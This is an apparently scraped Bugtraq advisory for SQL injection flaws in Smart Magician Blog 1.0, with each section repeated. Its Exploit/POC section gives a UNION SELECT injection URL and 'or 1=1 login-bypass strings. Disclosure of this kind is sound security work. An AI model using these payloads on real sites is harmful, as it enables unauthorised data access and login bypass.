Smart Magician Blog Multiple SQL Injection Vulnerabilities
BID:43376
Info
Smart Magician Blog Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43376 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2009 12:00AM |
| Updated: | Jul 27 2009 12:00AM |
| Credit: | Evil-Cod3r |
| Vulnerable: |
Smart Magician Blog 1.0 |
| Not Vulnerable: | |
Discussion
Smart Magician Blog Multiple SQL Injection Vulnerabilities
Smart Magician Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Smart Magician Blog 1.0 is vulnerable; other versions may be affected.
Smart Magician Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Smart Magician Blog 1.0 is vulnerable; other versions may be affected.
Exploit / POC
Smart Magician Blog Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following URI is available:
http://www.example.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
The following data is available:
admin First : 'or 1=1 or ' & or & 'or 1=1/*
Attackers can use a browser to exploit these issues.
The following URI is available:
http://www.example.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
The following data is available:
admin First : 'or 1=1 or ' & or & 'or 1=1/*
Solution / Fix
Smart Magician Blog Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].